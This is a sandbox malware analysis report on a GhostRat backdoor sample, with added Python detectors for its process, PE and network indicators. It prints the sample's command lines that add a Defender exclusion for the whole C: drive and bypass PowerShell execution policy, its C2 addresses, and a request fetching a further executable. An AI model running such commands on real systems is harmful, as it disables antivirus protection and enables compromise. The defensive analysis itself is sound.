Windows Analysis Report
leBwnyHIgx.exe

Overview

General Information

Sample name: leBwnyHIgx.exe (renamed because the original name is a hash value)
Original sample name: 51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845.exe
Analysis ID: 1585743
MD5: 2a7776214c4870137fe8aabb231cf52e
SHA1: 3134458ad9ff7a6e76543427794fbcee1d7eda07
SHA256: 51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

GhostRat
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • leBwnyHIgx.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\leBwnyHIgx.exe" MD5: 2A7776214C4870137FE8AABB231CF52E)
    • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2032 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 2492 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • leBwnyHIgx.exe (PID: 180 cmdline: "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe" MD5: 2A7776214C4870137FE8AABB231CF52E)
      • cmd.exe (PID: 2180 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5684 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2664 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5444 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5928 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6616 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 2916 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6100 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
Extracted malware configuration: {"C2 url": ["154.82.85.107:15091", "154.82.85.107:15092"]}

Yara matches on memory dumps (33 entries in the full report; first 5 shown)
Source | Rule | Description | Author
00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security

Yara matches on unpacked PE files (79 entries in the full report; first 5 shown)
Source | Rule | Description | Author
5.2.leBwnyHIgx.exe.44e05eb.12.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
5.3.leBwnyHIgx.exe.4252c53.12.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
5.3.leBwnyHIgx.exe.428486b.37.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
5.2.leBwnyHIgx.exe.4252c53.9.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
5.3.leBwnyHIgx.exe.4252c53.30.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security

                      System Summary

Sigma rule matches (process creation events)

Source: Process started; Author: Florian Roth (Nextron Systems); Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"; Image: C:\Windows\SysWOW64\cmd.exe; ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe"; ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe; ParentProcessId: 2004; ProcessId: 6540
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1; Image: C:\Windows\SysWOW64\cmd.exe; ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe"; ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe; ParentProcessId: 2004; ProcessId: 2916
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1; Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1; ParentImage: C:\Windows\SysWOW64\cmd.exe; ParentProcessId: 2916; ProcessId: 6100
Source: Process started; Author: frack113; Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"; Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"; ParentImage: C:\Windows\SysWOW64\cmd.exe; ParentProcessId: 6540; ProcessId: 2032
Source: Process started; Author: Florian Roth (Nextron Systems); Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"; Image: C:\Windows\SysWOW64\cmd.exe; ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe"; ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe; ParentProcessId: 2004; ProcessId: 6540
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"; Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"; ParentImage: C:\Windows\SysWOW64\cmd.exe; ParentProcessId: 6540; ProcessId: 2032
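The process tree and the Sigma hits above come down to three command-line patterns: a Defender exclusion for the whole C: drive, Set-ExecutionPolicy Unrestricted for the current user, and -ExecutionPolicy Bypass running updated.ps1 out of AppData or Temp. Note also that the Sigma data records Image as C:\Windows\SysWOW64\cmd.exe while the command line names System32: the 32-bit parent is subject to WOW64 file system redirection, so detection logic should not key on the System32 path alone. The Python below is an added example, not part of the Joe Sandbox report, that applies the same checks to process-creation records (Sysmon event 1 or Security 4688 style). The records are constructed from the command lines in the tree, keeping the report's PIDs; the benign Get-MpPreference event (pid 7000) is invented for contrast, and the regexes and severity labels are the editor's choices, not a published rule set.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon EID 1 / Security 4688 style)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


# powershell.exe accepts unambiguous parameter prefixes (-ep, -ex, -exec),
# so match those as well as the full parameter name.
DEFENDER_EXCLUSION = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\s+"
    r"(?P<value>\"[^\"]*\"|'[^']*'|\S+)", re.I)
DRIVE_ROOT = re.compile(r"[A-Za-z]:\\?")
POLICY_CHANGE = re.compile(r"Set-ExecutionPolicy\s+(?:Unrestricted|Bypass)", re.I)
POLICY_BYPASS = re.compile(r"(?:^|\s)-(?:ExecutionPolicy|exec|ex|ep)\s+(?:Bypass|Unrestricted)", re.I)
SCRIPT_FILE = re.compile(r"(?:^|\s)-(?:File|f)\s+(?P<path>\"[^\"]*\"|'[^']*'|\S+)", re.I)
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData|Desktop|Downloads)\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\", re.I)


def analyse(ev):
    """Return (rule, severity) pairs for one event."""
    findings = []
    m = DEFENDER_EXCLUSION.search(ev.cmdline)
    if m:
        excluded = m.group("value").strip("\"'")
        # A bare drive root switches off on-access scanning for the whole volume.
        sev = "critical" if DRIVE_ROOT.fullmatch(excluded) else "high"
        findings.append(("defender_exclusion_added", sev))
    if POLICY_CHANGE.search(ev.cmdline):
        findings.append(("execution_policy_weakened", "medium"))
    s = SCRIPT_FILE.search(ev.cmdline)
    if POLICY_BYPASS.search(ev.cmdline) and s and USER_WRITABLE.search(s.group("path")):
        findings.append(("bypass_script_from_user_writable_dir", "high"))
    if USER_WRITABLE.search(ev.parent_image):
        findings.append(("parent_in_user_writable_dir", "low"))
    return findings


def scan(events):
    """Map pid -> rule names for every event that produced at least one finding."""
    out = {}
    for ev in events:
        hits = analyse(ev)
        if hits:
            out[ev.pid] = [rule for rule, _ in hits]
    return out


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
DROPPER = r"C:\Users\user\Desktop\leBwnyHIgx.exe"

# Constructed from the report's process tree; pid 7000 is an invented benign control.
EVENTS = [
    ProcessEvent(6540, CMD, r'''"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"''', DROPPER),
    ProcessEvent(2032, PS, r'''powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"''', CMD),
    ProcessEvent(5684, PS, r'''powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"''', CMD),
    ProcessEvent(5444, PS, r'''powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1''', CMD),
    ProcessEvent(2916, CMD, r'''"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1''', DROPPER),
    ProcessEvent(6100, PS, r'''powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1''', CMD),
    ProcessEvent(7000, PS, r'''powershell -NoProfile -Command "Get-MpPreference | Select-Object ExclusionPath"''', r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, rules)
```

Both the cmd.exe and the child powershell.exe events fire, which is why the report shows the same command twice under different Sigma rules; deduplicate on the PowerShell child when counting incidents. Severity is driven by the excluded path: a single file path under -ExclusionPath is bad, a drive root is a full AV bypass.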
Suricata IDS alerts (high severity)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T07:15:33.044544+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 154.82.85.107 | 15091 | TCP
2025-01-08T07:16:43.500651+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 154.82.85.107 | 15091 | TCP
2025-01-08T07:17:55.290074+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50009 | 154.82.85.107 | 15091 | TCP

Suricata IDS alerts (low severity)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T07:15:05.390726+0100 | 2001046 | 3 | Misc activity | 47.79.48.230 | 443 | 192.168.2.4 | 49732 | TCP


                      AV Detection

Source: leBwnyHIgx.exe.180.5.memstrmin; Malware Configuration Extractor: GhostRat {"C2 url": ["154.82.85.107:15091", "154.82.85.107:15092"]}
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; ReversingLabs: Detection: 23%
Source: leBwnyHIgx.exe; Virustotal: Detection: 29%
Source: leBwnyHIgx.exe; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
Source: leBwnyHIgx.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 47.79.48.230:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: leBwnyHIgx.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
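The static PE information above (file characteristics, DLL characteristics, and the "PE file contains an invalid checksum" signature) is all read from IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER. The Python below is an added example, not from the report or from Joe Sandbox, that decodes those two flag words and recomputes the PE CheckSum with the same algorithm imagehlp's MapFileAndCheckSum uses. Because the sample binary is not available on this page, the code builds a constructed header-only PE32 image carrying the exact flag values the report lists (0x818F and 0x8140) and a zero CheckSum; the flag name tables are the editor's subset of the documented constants.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits (subset of the documented constants)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED", 0x2000: "DLL", 0x8000: "BYTES_REVERSED_HI",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (subset)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}


def decode_flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_checksum(data, checksum_offset):
    """PE CheckSum: sum the file as 32-bit words with end-around carry, skipping
    the CheckSum field itself, fold to 16 bits, then add the file length.
    checksum_offset must be 4-byte aligned (it is for any sane e_lfanew)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data):
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, _nsect, _ts, _symptr, _nsym, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # CheckSum sits at +64 and DllCharacteristics at +70 in both PE32 and PE32+.
    checksum_off = opt + 64
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "characteristics": decode_flags(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": decode_flags(struct.unpack_from("<H", data, opt + 70)[0], DLL_CHARACTERISTICS),
        "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
        "computed_checksum": pe_checksum(data, checksum_off),
        "checksum_offset": checksum_off,
    }


def checksum_is_valid(data):
    info = parse_pe(data)
    return info["stored_checksum"] == info["computed_checksum"]


def fix_checksum(data):
    """Write the recomputed CheckSum back into the header (what /RELEASE does)."""
    info = parse_pe(data)
    out = bytearray(data)
    struct.pack_into("<I", out, info["checksum_offset"], info["computed_checksum"])
    return bytes(out)


def build_minimal_pe(characteristics, dll_characteristics, checksum=0):
    """Constructed header-only PE32 image (no sections) for exercising the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Flag values that decode to exactly the lists in the report's static PE information.
SAMPLE = build_minimal_pe(0x818F, 0x8140)

if __name__ == "__main__":
    print(parse_pe(SAMPLE))
    print("valid:", checksum_is_valid(SAMPLE), "after fix:", checksum_is_valid(fix_checksum(SAMPLE)))
```

A stored CheckSum of zero is what most non-Microsoft linkers emit unless asked for one, and Windows only enforces the field for kernel drivers and boot-time DLLs, so "invalid checksum" on its own is a weak indicator; it carries weight here only alongside the Yara, Sigma and Suricata hits. RELOCS_STRIPPED together with DYNAMIC_BASE is worth a second look as well: without a relocation table the image cannot actually be rebased, so ASLR is effectively off for it regardless of the flag.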
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: leBwnyHIgx.exe, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: leBwnyHIgx.exe, 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbu source: powershell.exe, 0000000B.00000002.1806539404.0000000006E91000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{/; source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: b:, e:, f:, g:, h:, i:, j:, k:, l:, m:, n:, o:, p:, q:, r:, s:, t:, u:, v:, w:, x:, y:, z:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: c:
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; File opened: [: ('[' is the ASCII character after 'Z', consistent with a drive-letter enumeration loop that runs one position past Z)
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_0040C86C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_0040C86C FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe; Code function: 5_2_030780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW

                      Networking

Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49740 -> 154.82.85.107:15091
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49741 -> 154.82.85.107:15091
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50009 -> 154.82.85.107:15091
Source: Malware configuration extractor; URLs: 154.82.85.107:15091
Source: Malware configuration extractor; URLs: 154.82.85.107:15092
Source: global traffic; TCP traffic: 154.82.85.107 ports 18852,8853,15092,15091,3,5,8
Source: global traffic; TCP traffic: 192.168.2.4:49730 -> 154.82.85.107:8853
Source: Joe Sandbox View; ASN Name: ROOTNETWORKSUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 47.79.48.230:443 -> 192.168.2.4:49732
Source: unknown; TCP traffic detected without corresponding DNS query: 154.82.85.107 (this entry appears 50 times in the full report, once per connection)
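The report flags 154.82.85.107 through three separate weak signals: the C2 address is a literal IP:port pair in the configuration, so every connection to it happens with no preceding DNS query; the sample talks to several ports on that one host (18852, 8853, 15092, 15091); and none of those ports is a standard service port. The Python below is an added example, not part of the report, that turns those observations into detection logic over flow records of the kind Zeek's conn.log or a NetFlow export would give. The records are constructed from the report's traffic section (timestamps rounded to the second); the DNS answer mapping the Aliyun OSS hostname to 47.79.48.230 is an assumption for the sake of a benign control, since the report shows the query and the HTTPS flow but does not print the answer.

```python
from collections import defaultdict
from datetime import datetime

# Constructed flow records modelled on the report's traffic section, not a sandbox capture.
# (time, queried name, answer IP); the OSS-host answer is assumed, see lead-in.
DNS_ANSWERS = [
    ("2025-01-08T07:15:04", "xrpy.oss-ap-southeast-1.aliyuncs.com", "47.79.48.230"),
]
# (time, src IP, src port, dst IP, dst port)
TCP_FLOWS = [
    ("2025-01-08T07:15:05", "192.168.2.4", 49732, "47.79.48.230", 443),
    ("2025-01-08T07:15:20", "192.168.2.4", 49730, "154.82.85.107", 8853),
    ("2025-01-08T07:15:33", "192.168.2.4", 49740, "154.82.85.107", 15091),
    ("2025-01-08T07:16:43", "192.168.2.4", 49741, "154.82.85.107", 15091),
    ("2025-01-08T07:17:00", "192.168.2.4", 49800, "154.82.85.107", 15092),
    ("2025-01-08T07:17:10", "192.168.2.4", 49801, "154.82.85.107", 18852),
]
COMMON_PORTS = {22, 25, 53, 80, 443, 587, 993, 995, 3389}


def _ts(s):
    return datetime.fromisoformat(s)


def destinations_without_dns(dns_answers, flows):
    """Destination IPs contacted before any DNS answer named them.
    Hard-coded IP:port C2, as in this sample's configuration, shows up this way."""
    first_seen = {}
    for t, _name, ip in dns_answers:
        first_seen[ip] = min(_ts(t), first_seen.get(ip, _ts(t)))
    hits = set()
    for t, _src, _sport, dst, _dport in flows:
        if dst not in first_seen or _ts(t) < first_seen[dst]:
            hits.add(dst)
    return hits


def multi_port_destinations(flows, min_ports=3):
    """Destinations contacted on at least min_ports distinct TCP ports
    (the report's 'connects to many ports of the same IP' behaviour)."""
    ports = defaultdict(set)
    for _t, _src, _sport, dst, dport in flows:
        ports[dst].add(dport)
    return {dst: sorted(p) for dst, p in ports.items() if len(p) >= min_ports}


def non_standard_port_flows(flows, common=COMMON_PORTS):
    return [(dst, dport) for _t, _src, _sport, dst, dport in flows if dport not in common]


def suspicious_c2_candidates(dns_answers, flows, min_ports=3):
    """Require all three signals on one destination; each alone is noisy
    (CDNs are hit by IP after a cached lookup, scanners touch many ports, and
    plenty of legitimate services live on odd ports)."""
    no_dns = destinations_without_dns(dns_answers, flows)
    multi = multi_port_destinations(flows, min_ports)
    odd = {dst for dst, _ in non_standard_port_flows(flows)}
    return sorted(ip for ip in no_dns if ip in multi and ip in odd)


if __name__ == "__main__":
    print(suspicious_c2_candidates(DNS_ANSWERS, TCP_FLOWS))
```

Feed real data in by replacing the two constructed lists with parsed dns.log and conn.log rows; the time-ordering check in destinations_without_dns matters, because a DNS answer logged after the first connection is exactly what a hard-coded C2 address looks like when the host later happens to be resolved by something else.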
Source: C:\Users\user\Desktop\leBwnyHIgx.exe; Code function: 0_2_00421DFC VirtualAlloc,WSAStartup,socket,VirtualProtect,WriteProcessMemory,connect,recv,closesocket
Source: global traffic; HTTP traffic detected:
  GET /wpsv.5.6.3.exe HTTP/1.1
  User-Agent: URLDownloader
  Host: xrpy.oss-ap-southeast-1.aliyuncs.com
  Cache-Control: no-cache
Source: global traffic; DNS traffic detected: DNS query: xrpy.oss-ap-southeast-1.aliyuncs.com
